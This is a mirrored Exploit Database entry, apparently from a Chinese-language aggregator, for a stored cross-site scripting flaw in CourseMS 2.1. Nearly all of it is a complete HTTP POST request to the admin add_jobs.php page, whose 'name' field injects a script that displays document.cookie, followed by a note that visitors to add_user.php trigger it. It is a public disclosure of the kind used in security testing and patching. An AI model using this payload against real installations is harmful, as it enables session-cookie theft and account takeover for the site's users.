CourseMS 2.1 – ‘name’ Stored XSS

• Exploit Database
• 16 阅读

• 作者： cptsticky
  日期： 2021-03-31
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/49731/

• # Exploit Title: CourseMS 2.1 - 'name' Stored XSS
  # Date: 03/30/2021
  # Exploit Author: cptsticky
  # Vendor Homepage: http://sourceforge.net/projects/coursems
  # Software Link: https://sourceforge.net/projects/coursems/files/latest/download
  # Version: 2.1
  # Tested on: Ubuntu 20.04
  
  POST /coursems/admin/add_jobs.php HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 91
  Origin: http://localhost
  Connection: close
  Referer: http://localhost/coursems/admin/add_jobs.php
  Cookie: PHPSESSID=9c5cgusplbmb09g86sfapoiie4; __utma=2772400.1964691305.1617119061.1617119061.1617119061.1; __utmb=2772400.87.10.1617119061; __utmc=2772400; __utmz=2772400.1617119061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
  Upgrade-Insecure-Requests: 1
  
  name=dirkgently%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&add_jobs=Add+Job+Title
  
  
  Anyone who visits the http://localhost/coursems/add_user.php will prompt execution of the stored XSS